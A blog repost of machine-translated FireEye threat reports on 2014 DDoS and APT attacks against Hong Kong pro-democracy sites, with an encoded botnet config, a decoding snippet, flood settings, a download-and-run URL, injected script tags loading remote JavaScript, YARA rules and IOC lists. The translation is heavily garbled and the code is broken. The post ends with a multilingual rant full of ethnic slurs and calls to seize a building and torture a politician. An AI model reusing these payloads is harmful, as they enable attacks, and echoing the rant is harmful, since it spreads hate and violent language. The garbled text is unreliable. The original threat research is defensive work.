  EGwQbHxsFGwRPUk8nIHF / Wk5LXk95T1hcT1h3JyBkT118T1hZQ0VEFxgaGx4 

  aExgcJyB / Wk5LXk9sQ0ZPf1hGF0JeXloQBQUbGgQaBBsEGx8bBRsET1JPJyBx 

  bm5leXViRVleeV5LXkNZXkNJWXcnIGlFX0Ref1hGFycgfkNHT1gXGCcgcW5uZ 

  Xl1eUlYQ1pebEZFRU53JyBjWXlJWENaXmxGRUVOFxsnIGlHTmNuFxsYGScgeU 

  lYQ1pebEZFRU5uZHkXJyB5SVhDWl5sRkVFTn9YRhdCXl5aEAUFRFJLWkMES1p 

  aRk9OS0NGUwRJRUcEQkEFJyB5SVhDWl5sRkVFTnpFWF4XEhonIGNZbU9ef1hG 

  bENGTxcbJyBjWXlPRE56S0lBT14XGicgfkJYT0tOZkVFWn5DR08XHycgfkJYT 

  0tOaUVfRF4XGxonIH5DR09YFxkcGicgY1l + Q0dPWBcbJyBxbm5leXV5SVhDWl 

  5sRkVFTnVrG3cnIGNZeUlYQ1pebEZFRU4XGicgaUdOY24XGycgeUlYQ1pebEZ 

  FRU5uZHkXGxoEGgQbBBsfGycgeUlYQ1pebEZFRU5 / WEYXGxoEGgQbBBsfGwUb 

  BEJeR0YnIHlJWENaXmxGRUVOekVYXhcSGicgY1ltT15 / WEZsQ0ZPFxsnIGNZe 

  U9ETnpLSUFPXhcbJyB + QlhPS05mRUVafkNHTxcbJyB + QlhPS05pRV9EXhcbJy 

  B + Q0dPWBcYGicgY1l + Q0dPWBcbJyBxbm5leXV / TlpsRkVFTncnIGNZf05abEZ 

  FRU4XGicgaUdOY24XGycgf05abEZFRU5uZHkXGxoEGgQbBBsfGycgfkJYT0tO 

  aUVfRF4XGycgfkNHT1gXGBonIGNZfkNHT1gXGycgcW5uZXl1f05abEZFRU51a 

  xt3JyBjWX9OWmxGRUVOFxonIGlHTmNuFxsnIH9OWmxGRUVObmR5FxsaBBoEGw 

  QbHxsnIH5CWE9LTmlFX0ReFxsnIH5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV 

  5dXlTRGxGRUVOdycgY1l5U0RsRkVFThcaJyBpR05jbhcbJyB5U0RsRkVFTm5k 

  eRcbGgQaBBsEGx8bJyB5U0RsRkVFTnpFWF4XEhonIH5CWE9LTmlFX0ReFxsnI 

  H5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV5dX5JWmxGRUVOdycgY1l + SVpsRk 

  VFThcaJyBpR05jbhcbJyB + SVpsRkVFTm5keRcbGgQaBBsEGx8bJyB + SVpsRkV 

  FTnpFWF4XEhonIGNZeU9ETnpLSUFPXhcbJyB + QlhPS05pRV9EXhcbJyB + Q0dP 

  WBcYGicgY1l + Q0dPWBcbJyBxbm5leXV + SVpsRkVFTnVrG3cnIGNZfklabEZFR 

  U4XGicgaUdOY24XGycgfklabEZFRU5uZHkXGxoEGgQbBBsfGycgfklabEZFRU 

  56RVheFxIaJyBjWXlPRE56S0lBT14XGycgfkJYT0tOaUVfRF4XHCcgfkNHT1g 

  XGBonIGNZfkNHT1gXGycg @ $ @
該配置文件可以通過汽提前和後@ $ @字符進行解碼。 在這一點上,一個簡單的base64和XOR譯碼將揭示明文配置。 Python代碼下面的代碼片段可用於解碼此命令: 
  b64encoded = request.content.rstrip(“@ $ @”)。lstrip(“@ $ @”)   b64decoded = b64encoded.decode(“BASE64”) 

 命令=“” 

 對於C在b64decoded: 

  X = ORD(三) 

  X = X ^ XOR_key 

 命令+ = CHR(X)
FireEye已經發現用於在這項運動的DDOS C2服務器發出的配置文件進行編碼兩種不同的單字節XOR鍵。 這兩種不同的鍵是0x2A或0x7E的。 上面所示的編碼配置文件進行解碼,以: 
  [KernelSetting]   IsReportState = 0 

  IsDownFileRun0 = 0 

  CmdID0 = 1 

  DownFileRunUrl0 = HTTP://10.0.1.151/1.exe 

  [UpdateServer] 

 動態網頁= 20140926 

  UpdateFileUrl = HTTP://10.0.1.151/1.exe 

  [DDOS_HostStatistics] 

  CountUrl = 

 定時器= 2 

  [DDOS_ScriptFlood] 

  IsScriptFlood = 1 

  CmdID = 123 

  ScriptFloodDNS = 

  ScriptFloodUrl = HTTP://nxapi.appledaily.com.hk/ 

  ScriptFloodPort = 80 

  IsGetUrlFile = 1 

  IsSendPacket = 0 

  ThreadLoopTime = 5 

 經緯= 10 

 定時器= 360 

  IsTimer = 1 

  [DDOS_ScriptFlood_A1] 

  IsScriptFlood = 0 

  CmdID = 1 

  ScriptFloodDNS = 10.0.1.151 

  ScriptFloodUrl = 10.0.1.151 / 1.HTML 

  ScriptFloodPort = 80 

  IsGetUrlFile = 1 

  IsSendPacket = 1 

  ThreadLoopTime = 1 

 經緯= 1 

 定時器= 20 

  IsTimer = 1 

  [DDOS_UdpFlood] 

  IsUdpFlood = 0 

  CmdID = 1 

  UdpFloodDNS = 10.0.1.151 

 經緯= 1 

 定時器= 20 

  IsTimer = 1 

  [DDOS_UdpFlood_A1] 

  IsUdpFlood = 0 

  CmdID = 1 

  UdpFloodDNS = 10.0.1.151 

 經緯= 1 

 定時器= 20 

  IsTimer = 1 

  [DDOS_SynFlood] 

  IsSynFlood = 0 

  CmdID = 1 

  SynFloodDNS = 10.0.1.151 

  SynFloodPort = 80 

 經緯= 1 

 定時器= 20 

  IsTimer = 1 

  [DDOS_TcpFlood] 

  IsTcpFlood = 0 

  CmdID = 1 

  TcpFloodDNS = 10.0.1.151 

  TcpFloodPort = 80 

  IsSendPacket = 1 

 經緯= 1 

 定時器= 20 

  IsTimer = 1 

  [DDOS_TcpFlood_A1] 

  IsTcpFlood = 0 

  CmdID = 1 

  TcpFloodDNS = 10.0.1.151 

  TcpFloodPort = 80 

  IsSendPacket = 1 

 經緯= 6 

 定時器= 20 

  IsTimer = 1
在我們的研究過程中,我們已經觀察到上面列出的C2服務器發出超過30個不同的獨特的配置文件。 這些配置發出的命令來攻擊下面的域和IP地址: 
  nxapi.appledaily.com [。] HK   202.85.162.90 

  58.64.139.10 

  202.85.162.97 

  202.85.162.81 

  198.41.222.6 

  202.85.162.101 

  202.85.162.95 

  202.85.162.180 

  202.85.162.140 

  202.85.162.130 

  124.217.214.149
以上所有IP地址的主機壹傳媒或蘋果日報的網站,除58.64.139.10和124.217.214.149的。 該IP 58.64.139.10主辦hkgolden COM [。] - 對於上述HKGolden論壇域。
對於10月23日和24日之間大約14個小時,攻擊者推配置更新到指示其控制洪水124.217.214.149與UDP流量下的機器人四個控件的服務器。 該IP 124.217.214.149主辦的攻擊者控制域p.java秒[。]玉米。
在2014年10月23日,兩人的主動控制的指示開始參加機器人停止攻擊。 由2014年10月24日,所有五個已知的主動控制服務器發出了命令停止攻擊。
它應該是毫不奇怪,hkgolden融為一體,nextmedia COM和appledaily.com HK網站現在或以前已被封鎖,中國的長城防火牆[] [] [] - 這表明中國已發現該內容託管在這些網站上反感。

鏈接到前活動

這些DDoS攻擊和以前的APT活動之間最直接的連接是使用QTI國際和CallTogether代碼簽名證書,我們已經看到了惡意軟件由於APT活動。
該QTI國際數字證書以前已用於登錄APT活動,包括操作中毒颶風使用二進制文件。 具體來說,17bc9d2a640da75db6cbb66e5898feb1是由QTI國際證書簽名的PlugX變種。 這PlugX變種連接到code.google一個谷歌代碼項目[。] COM / P / udom /,它解碼所配置的C2服務器的命令。
樣品0b54ae49fd5a841970b98a078968cb6b是與QTI國際證書簽名也是如此。 路過式攻擊在2014年6月期間第一次觀察到這個樣本,以及從Java-SE被下載[。] COM / jp.jpg。 該樣品被檢測為Backdoor.APT.Preshin並連接到luxscena [。]玉米的C2。
該QTI國際證書也被用來簽署e2a4b96cce9de4fb126cfd5f5c73c3ed。 我們發現這個有效載荷為Backdoor.APT.PISCES,它使用hk.java-SE [。]玉米為C2。 在Java-SE [。] COM網站以前在針對香港民運其他攻擊。 首先,我們觀察到惡意的JavaScript存在插入民主民生協進公會於2014年6月26日,這表現為以下幾點: 
 的<a href =“htt​​p://www.adpl.org.hk/?p=2680”稱號=“抗議九巴加價要求凍結加價,改善服務   <SCRIPT LANGUAGE = javascript的SRC = HTTP://java-se.com/o.js> </ SCRIPT>“>
最近,正如克勞迪奧瓜爾涅,香港民主黨的網站被視為託管重定向到同一個惡意的JavaScript。
所述CallTogether證書已用於簽署ecf21054ab515946a812d1aa5c408ca5。 我們也檢測到這種有效載荷Backdoor.APT.PISCES並觀察其連接到u.java-SE [。]玉米。
這兩種證書是有效的,但通過以下屋簽名可以檢測並阻止: 
 排除callTogether_certificate   { 

 元: 

 筆者=“Fireeye實驗室” 

 版本=“1.0” 

  reference_hash =“d08e038d318b94764d199d7a85047637” 

 說明=“檢測與CallTogether證書簽名的二進制文件” 

 字符串: 

  $串行= {} 452156C3B3FB0176365BDB5B7715BC4C 

  $ O =“CallTogether公司” 

 條件: 

  $串行和$Ø 

  } 

 規則qti_certificate 

  { 

 元: 

 筆者=“Fireeye實驗室” 

  reference_hash =“cfa3e3471430a0096a4e7ea2e3da6195” 

 說明=“檢測與QTI國際公司的證書簽名的二進制文件” 

 字符串: 

  $ CN =“QTI國際公司” 

  $串行= {2E DF B9 FD CF A0 0℃CB 5A B0 09 EE 3A DB 97 B9} 

 條件: 

  $ cn和$串行 

  }
這些持續的DDoS攻擊和以往的APT入侵活​​動均針對hkgolden [。] COM網站。 如上所述,這個網站已經有針對性的DDoS攻擊通過KernelBot網絡。 我們還發現,hkgolden COM網站被攻破的2014年9月5日,有一個重定向到一個惡意的JavaScript再次舉辦另一個java的,本身融為一體的主機,從而出現如下[。] [。]: 
 的document.write(“<SCRIPT LANGUAGE = javascript的SRC = HTTP://jre76.java-se.com/js/rss.js> </ SCRIPT>
最後,如上面提到的知識產權124.217.214.149被看見承載域p.java秒[]玉米2014年10月25日和10月27日,2014年間作為布蘭登迪克森注意到這裡 ,在java秒[。] COM域名是在下面的IP地址鏈接到java-COM本身通過共享主機的歷史[。]: 
  124.248.237.26   223.29.248.9 

  211.233.89.182 

  112.175.143.2 

  112.175.143.9
目前還不清楚為什麼這些演員會攻擊他們積極使用IP地址。 這有可能是攻擊者希望通過攻擊他們使用,以收集有關攻擊的規模統計信息的IP,以測試他們的殭屍網絡的能力。 這也有可能是攻擊者只是犯了一個錯誤,不小心發出的命令來攻擊自己的基礎設施。 在2014年10月24日,攻擊自己的基礎設施後,攻擊者發出自己的殭屍網絡是停止所有的攻擊,新的指令。

結論

雖然沒有定論, 上面提出的證據表明證實APT活動,這似乎是旨在沉默香港臨民主運動持續DDoS攻擊之間的聯繫 證據不確鑿證明責任的DDoS攻擊相同的演員也上文所討論的觀察入侵活動的背後 - 如操作中毒颶風。 相反,證據可以指示一個常見軍需既支持DDoS攻擊和正在進行的入侵活性。
在這兩種情況下,有入侵行為記錄在操作中毒颶風和這裡記錄的DDOS攻擊之間有著明顯的聯繫。 雖然這些活動的策略是從技術的角度非常不同,每個支持不同的政治目標。 操作中毒颶風的目標似乎有部分是IP盜竊可能是為了經濟利益或其他的競爭優勢。 在DDOS攻擊,目的是壓制言論自由和箝制香港親民主運動。 中國政府是最有可能有興趣在實現這兩個目標的實體。

附錄

MD5s 
  c3d6450075d618b1edba17ee723eb3ca   d08e038d318b94764d199d7a85047637 

  84bd0809b1dbc2dc86f30d30faaa7e4e 

  39bb90140fc0101f49377b6c60076f9d 

  caa5529010c17b969da01ade084794c6 

  17bc9d2a640da75db6cbb66e5898feb1 

  0b54ae49fd5a841970b98a078968cb6b 

  e2a4b96cce9de4fb126cfd5f5c73c3ed 

  ecf21054ab515946a812d1aa5c408ca5
主機名 
  tommo [。] JP   mizma.co [。] JP 

  sp.you-馬夾[。]玉米 

  NITORI遊[。]玉米 

  ninekobe [。]玉米 

  shinzenho [。] JP 

  wizapply [。]玉米 

  www.credo-BIZ [。]玉米 

  www.sapporo-數字photoclub [。]玉米 

  wakayamasatei [。]玉米 

  luxscena [。]玉米 

  Java的SE [。]玉米 

  hk.java-SE [。]玉米 

  u.java-SE [。]玉米 

  jre76.java-SE [。]玉米 

  p.java秒[。]玉米
此項目被張貼在週一11月3日8時00分23秒EST 2014年,並在申請高級惡意軟件博客網絡安全惡意軟件邁克·奧本海姆邁克·斯科特斯內德莫蘭威脅智能感知系統威脅研究零天


 =======================================================
 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

通過網絡抑制沉默異議

|按照 托尼·科爾 | 威脅智能感知系統威脅研究

 今天,我們的實驗室團隊發布了一個博客名為“工作中毒切換:APT之間的揭幕活動的關係,香港的民運。” 顯然,中國政府已確定了社交媒體和不受控制的信息作為主要威脅。 負責為一些圍繞知識產權盜竊高級持續性威脅(APT)攻擊和正在進行的分佈式拒絕對臨民主運動在香港有道理服務攻擊可能中國黑客之間的聯繫。 中國政府正利用自己深厚的專業黑客獲取了關閉任何在線系統主機有關的信息和支持民運在香港。 在這期間,他們繼續通過中國的長城防火牆關閉社交媒體,從而限制訪問互聯網上的信息。
 
不受限制地訪問社交媒體可以允許對信息,新觀念的傳播瞬間,最重要的是,動盪。 最值得注意的是,阿拉伯之春,這開始於12月18日,並迅速通過社交媒體引起抗議和起義了一場震動周邊地區蔓延。 到2013年年底,眾多的統治者被迫從權力在中東。 這是一個強大的工具,示威者用來組織並公開讓世界知道他們的政府在做什麼,以讓他們保持沉默。
 
大多數政府通常不喜歡廣泛的異議。 它使運行的國家更加困難,當人口的比例顯著不滿意,使目前的執政黨看壞到世界各地的具體政策或做法。 在一個自由開放的社會是持不同政見者更接受和實踐公開,通常受到很多媒體和政府別無選擇,只能接受它。 在一個封閉的社會裡,要么是不允許的或嚴格控制持不同政見者,媒體是在抗議的敵人,因為政府不希望世界看到任何不安,他們不希望在他們的國家稱為免得麻煩蔓延。 這就是為什麼一般人群除有什麼政府希望他們看到有限的訪問在線信息。 而今天的DDoS攻擊的啟示,我們看到各國政府不只是阻止訪問,但走了一步,以保持現狀到位。
此項目被張貼在週一11月3日8時05分04秒EST 2014年,並在申請高級威脅博客網絡安全Fireeye社會化媒體威脅智能感知系統威脅研究托尼·科爾


 ===============================================================
 http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

從中國經濟澳洲合作夥伴在攻擊:一把雙刃劍

| | 威脅智能感知系統威脅研究

 在9月中旬訪華期間,中國外交部部長王毅呼籲澳大利亞成為“東方與西方之間的橋樑。”他打倒在討論的進展自由貿易協定 ,這似乎可能在2010年底澳大利亞和中國之間的一年。 他評論稱進一步推動兩國間的貿易關係,但他可能也已經提到黑客誰希望利用深化同盟竊取信息。
澳大利亞金融評論(AFR)做了一個深入的文章與FireEye關於對澳大利亞企業中國的攻擊,而這個博客提供了額外的上下文。
澳大利亞經歷了前所未有的貿易增長,中國在過去的十年中,它創造了一個雙刃劍。 與中國企業澳大利亞企業合作夥伴,中國為基礎的威脅日益演員發射精密和有針對性的網絡攻擊,以獲得澳大利亞企業的機密信息。 在美國和歐洲,政府和私營行業的中國的攻擊已成為當地報紙的例程。 澳大利亞,似乎是下一個目標。
 
該數字
首先,讓我們回顧一下澳大利亞和中國的經濟相互依存的狀態。 平均每年9.10%的GDP增長速度在過去的二十年中,中國的空前的經濟擴張已經從保護澳大利亞最嚴重的全球金融危機的影響對中國的出口已經增長了十倍,從$ 8.3b美元,2001年為$ 90B美元在2013年[I]中,最突出的商品是鐵礦石和天然氣 大部分這些資源起源於澳大利亞,這使中國政府在顯著的壓力,以滿足他們的需求暴漲。 儘管不斷增加的合作,依賴澳大利亞和中國的份額為區域合作夥伴,中國政府有可能支持監控和情報收集來自澳大利亞經濟更高水平的 - 往往是通過中國國有企業(國有企業)在澳大利亞國內的關係進行的。
國有企業的直接投資進入澳大利亞成長為來自中國的所有外國投資流入的84%,在2014年,主要針對進入澳大利亞礦業和資源類板塊; 展現著進一步的信號控制為中國尋求捕捉確定性的水平,餐飲其未來的內部增長。 我們懷疑這是針對澳大利亞公司的具體議程由政府委託的網絡威脅的演員:獲得優勢,無論是在基礎設施和知識產權資產的控制權。
CHN
圖1。 中國的直接投資進入澳大利亞行業
的影響
怎麼會有這種夥伴關係的影響澳大利亞的網絡? Mandiant觀察到參與主要經濟部門,包括來自澳大利亞公司數據被竊取中國威脅論者的目標公司的戰略性業務。 中國的高級持續性威脅(APT的)是影響澳大利亞礦業和自然資源公司可能有興趣,尤其是在大宗商品價格峰值。 來自中國的APT攻擊的上升趨勢也朝著目標在礦業和自然資源的生態系統的第三方。 Mandiant相信中國的APT入侵的顯著的增加集中在持有機密的併購信息和敏感的知識產權律師事務所。 這不是巧合,這些第三方機構經常發現缺乏網絡保護。 調查還發現,在妥協的時候,大多數受害人公司都在與中國企業進行直接談判,試圖凸顯了中國政府爭取在目標地區的優勢。
 
由於其特有的污染問題,清潔能源已經發展成為一個重要的產業,中國。 該國現在搞一個計劃,發展戰略性新興產業(SEI必須)來解決這個問題。 澳大利亞知識產權和研發已經成為主要的數據,並採取了在中國APT活動主要地位。 再次,這是第三方像律師事務所正在受到攻擊的到來。
此外,為了減少中國對澳大利亞鐵礦石出口的依賴,北京已經啟動了一項計劃,建立一個高效,高端鋼材生產垂直通過在澳大利亞的戰略收購和干預,以防止不利的聯盟。 例如,國有企業中鋁公司收購了澳大利亞的礦業公司大概防止將不利其利益的合併。 顯然,澳大利亞的出口夥伴對中國的商業機密信息的日益追捧
Mandiant發現,多數受損企業有任何目前的談判與中國的企業,以前的商務活動與中國企業。 這些攻擊將會持續貿易和投資的增長,雖然他們會這麼做的機密澳洲商業信息,如R&D和知識產權的成本。 大澳大利亞礦業和資源企業本身可能與澳大利亞的信號首長安全的威脅者關注的焦點轉移到關聯方與訪問敏感數據,誰可能不會尋求與澳大利亞的信號局的合作夥伴關係的合作夥伴。 這就要求對發動越來越堅定和先進的攻擊更深刻的認識和保護。
 
底線
雖然這個博客的重點是對大澳大利亞礦業和資源領域的行為,Mandiant觀察到這些APT演員常常集中注意力於其他部門,如國防,電信,農業,政治組織,高科技,交通,航天,等等。 但更廣泛的教訓,從美國和歐洲的經驗與中國的信息繪製的攻擊,是沒有人或將被免除。 對於所有的澳大利亞企業和政府,它的時間來強化防禦的網絡安全的新時代。
[I]“澳大利亞政府對外貿易事務部。www.dfat.gov.au/publications/stats-pubs/australiasexports-
此項目被張貼在週一10月13日十九時00分49秒EDT 2014年,並在申請高級惡意軟件高級持續性威脅博客網絡攻擊網絡安全Mandiant威脅智能感知系統威脅研究


 ================================================================


 "Apple Daily news in real-known in the world, even though the Communist mainland how spiteful, not the integrity of the global all know, the Communist Party has never recognized such garbage done various kind of bad people in this world have sharp eyes, lie is not the mainland Communist bastard motherfucker skills, the lowest quality of dirty ground!
Hong Kong people are in Hong Kong, Taiwanese Taiwanese
Not the kind of low character refers to three four.
That '' is suffering '' junk please feel free to capture the building !!
Leung Chun-ying slaves dog feces prisoners in prison,
Torture it for life!
Peace and harmony ~
 
#############
The Australian Government also think that there are so Haopai continent livestock pig Zitouluowang it! ??
Please be cautious to protect themselves state property now!
chinaman will do good thing ?? !! (scared ...!)
Really a joke

http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
=============================

"蘋果日報以真實新聞知名於世界,縱使大陸共產黨如何刻毒,沒誠信全球皆知道,該等垃圾共產黨從來不承認做過的各種樣壞事,這世界的人們眼睛是雪亮的,謊言是大陸共產黨雜種沒娘養的本領,最低質素的骯臟地!
香港人是香港人,台灣人是台灣人
不容那種低等角色指三道四.
那個''正苦''垃圾大樓請隨時攻陷!!
把奴隸狗屎梁振英囚在牢中,
折磨牠一生一世!
天下太平~

#############
澳洲政府還以為有這麼豪派的大陸牲畜豬自投羅網嘛!??
請謹慎自保國家財產吧!
chinaman會做好事的嘛??!!(驚嚇...!)
真是天大的笑話

http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
=============================

실제 알려진 심지어 공산주의 본토 방법 짓궂은 불구하고, 모두가 알고있는 세계의하지 무결성, 공산당이 세상에서 나쁜 사람들의 다양한 종류를 다 같은 쓰레기를 인정하지 않았다 세계에 날카로운 눈을 가지고에서 "애플 데일리 뉴스, 거짓말은하지 본토 공산당 자식 새끼 능력, 더러운 땅의 가장 낮은 품질입니다!
홍콩 사람들은, 대만 대만 홍콩에
낮은 문자 같은 것이 아니라 3 ~ 4를 의미한다.
'정크 건물을 캡처 주시기 바랍니다'고통 '은'그!
양조위 천 잉은 감옥에서 개 배설물 포로 좌지우지
생명을 고문!
평화와 조화 ~

#############
호주 정부는 또한 Haopai 대륙 가축 돼지 Zitouluowang 그것은이 있다고 생각한다! ??
지금 자신에게 국가 재산을 보호하기 위해주의하세요!
중국인은 좋은 일을 할 것 ?? ! (무서워 ...!)
정말 농담

http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
=============================

"Apple Daily nouvelles en temps réel, connu dans le monde, même si la partie continentale communiste comment rancunier, pas l'intégrité de l'mondiale savons tous, le Parti communiste n'a jamais reconnu comme déchets et ordures diverses sortes de mauvaises gens dans ce monde ont des yeux perçants, mensonge ne est pas les compétences continentale communiste bâtard Motherfucker, la plus faible qualité du sol sale!
Habitants de Hong Kong sont à Hong Kong, de Taïwan taïwanais
Pas le genre de caractère faible se réfère à trois quatre.
Ce '' souffre 'indésirable' se il vous plaît sentir libre de capturer l'immeuble !!
Leung Chun-ying asservit excréments de chien détenus de la prison,
Torturer pour la vie!
Paix et l'harmonie ~

#############
Le gouvernement australien pense aussi qu'il ya tellement Haopai cochon continent de l'élevage Zitouluowang il! ??
Se il vous plaît soyez prudent de se protéger les biens de l'État maintenant!
chinaman fera bonne chose ?? !! (peur ...!)
Vraiment une blague

http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
=============================

"Apple Daily News en reala-konata en la mondo, eĉ se la Komunista ĉeftero kiom rankora, ne la integrecon de la tutmonda ĉiuj scias, la Komunisma Partio neniam rekonis tia rubo farita diversajn speco de malbona homo en ĉi tiu mondo havas akrajn okulojn, mensogo ne estas la ĉeftero Komunisma bastardo motherfucker kapablecoj, la plej malalta kvalito de malpura tero!
Hong Kong personoj estas en Hong Kong, Tajvano Tajvano
Ne tia malalta karaktero referencas al tri kvar.
Ke '' suferas '' junk bonvolu bonvolu kapti la konstruaĵo !!
Leung Chun-Ying sklavojn hundo feĉoj malliberuloj en malliberejo,
Turmenti lin por vivo!
Paco kaj harmonio ~

 
#############
La Aŭstralia Registaro ankaŭ opinias ke ekzistas tiom Haopai kontinento brutojn porko Zitouluowang ĝin! ??
Bonvolu esti singarda protekti ŝtata posedaĵo nun!
Ĥino faros bonan aferon ?? !! (timigita ...!)
Vere ŝerco

http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
=============================

---From "FireEye security research report, wary of international countries to defend your business carefully valuable property, or national intelligence, even for the same industry newspaper Apple Daily (DDoS) attack! *(1)*Operating poisoning switch : unveiling of APT relationship between Hong Kong's pro-democracy movement ** November 3, 2014 [according to 斯内德莫兰, 迈克奥 Oppenheim, Mike Scott,, threat intelligence, threat research ] - & - *(2)* over the network suppress silence dissent !(November 3, 2014 by Tony Cole morning,, threat intelligence, threat research) - & - *(3)*from the Chinese economic partner of Australia in the attack: a double-edged sword**( October 13, 2014, threat Intelligence,threat Research,,) -
---由"FireEye的安全硏究報告,警惕國際各國小心防衛你們的商業寶貴產權,或國家情報,甚至是針對蘋果日報的(DDoS)攻擊的同業界報社!*(1)*操作中毒切換:APT之間的揭幕活動的關係,香港的民運!**2014年11月3日 [按照 斯內德莫蘭,邁克奧本海姆,邁克·斯科特,,威脅智能感知系統,威脅研究 ]-&- *(2)*通過網絡抑制沉默異議!
(2014年11月3日上午由托尼·科爾,,威脅智能感知系統,威脅研究) -&-*(3)*從中國經濟澳洲合作夥伴在攻擊:一把雙刃劍**(二零一四年十月十三日,威脅智能感知系統,,威脅研究)-
 **USA/UK/SEAOUL KOREAN/TW/MACAU(FDZ)/HKS/FR/JP/UKN/DE/FA/POL/VI/ESP`/CO/ARG/PY/MEX/MO/AUST./RU/HO/MAL/NW/CA/IT/PH/Swedis/Mongolian/TUR/Arabic/Latin/INDON./Greek/Dansk/THAI/......All the world lauguage**-
http://melody-free-shaing.blogspot.com/2014/11/from-fireeye-security-research-report.html
---''FireEye 보안 연구 보고서 "에서, 다른 국가의 경계는 심지어 같은 산업 신문 빈과 일보 (DDoS 공격) 공격, 귀하의 비즈니스에 신중 소중한 재산, 또는 국가 정보를 보호하기 위해 *(1)*운영 중독 스위치!의 발표를 홍콩의 민주화 운동 ** 2014년 11월 3일 사이 APT 관계를 [斯内德莫兰, 迈克奥 오펜하임, 마이크 스콧,, 위협 정보, 위협 조사에 따르면] - & - *(2)*네트워크를 통해 억제 침묵의 반대 의견 (2014년 11월 3일 토니 콜 아침,, 위협 정보, 위협 연구에 의해) -&- *(3)*공격 호주의 중국 경제 파트너! 양날의 검 ** (10 월 13 일 2014, 위협 인텔리전스, 위협 연구,,)-
---De "FireEye rapport de recherche sur la sécurité, se méfiant des pays internationaux pour défendre votre entreprise attentivement biens de valeur, ou de l'intelligence nationale, même pour le même journal de l'industrie Apple Daily (DDoS)*(1)*interrupteur de l'empoisonnement d'exploitation: dévoilement de APT relation entre le mouvement pro-démocratie de Hong Kong ** 3 Novembre, 2014 [selon 斯内德莫兰, 迈克奥 Oppenheim, Mike Scott,, renseignements sur les menaces, la recherche de la menace] - & - *(2)*sur le réseau suppress faire taire la dissidence (3 Novembre, 2014 par Tony Cole matin,, renseignements sur les menaces, la recherche de la menace) - & - *(3)* de la partenaire chinois économique de l'Australie dans l'attaque: une épée à double tranchant **(13 Octobre, 2014, Threat Intelligence, la menace de recherche,,) -
---El "FireEye sekureco esplorado raporto, singarda de internaciaj landoj por protekti vian negocon zorgeme valora posedaĵo, aŭ nacia inteligenteco, eĉ por la sama industrio ĵurnalo Apple Daily (DDoS) atako! *(1)*Operating venenado ŝaltilo: solena malkovro de TAP rilato inter Hong Kong por-demokratian movadon ** novembro 3, 2014 [laŭ 斯内德莫兰, 迈克奥 Oppenheim, Mike Scott,, minaco inteligenteco, minaco esploro] - & - *(2)*super la reto subpremi silento malkonsento! (novembro 3, 2014 por Tony Cole mateno,, minaco inteligenteco, minaco esploro) - & - *(3)*el la ĉina ekonomia partnero de Aŭstralio en la atako: duobla tranĉrando glavo **(oktobro 13, 2014, minaco Inteligenteco, minaco Esplorado,,) -
 **USA/UK/SEAOUL KOREAN/TW/MACAU(FDZ)/HKS/FR/JP/UKN/DE/FA/POL/VI/ESP`/CO/ARG/PY/MEX/MO/AUST./RU/HO/MAL/NW/CA/IT/PH/Swedis/Mongolian/TUR/Arabic/Latin/INDON./Greek/Dansk/THAI/......All the world lauguage**-

===Melody.Blog===FOLLOW===>/

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!?????????????????????????????????????????????????????????


張貼者:
標籤:

沒有留言:

張貼留言

window.___gcfg = {
lang: 'zh-CN',
parsetags: 'onload'
};

訂閱: 張貼留言 (Atom)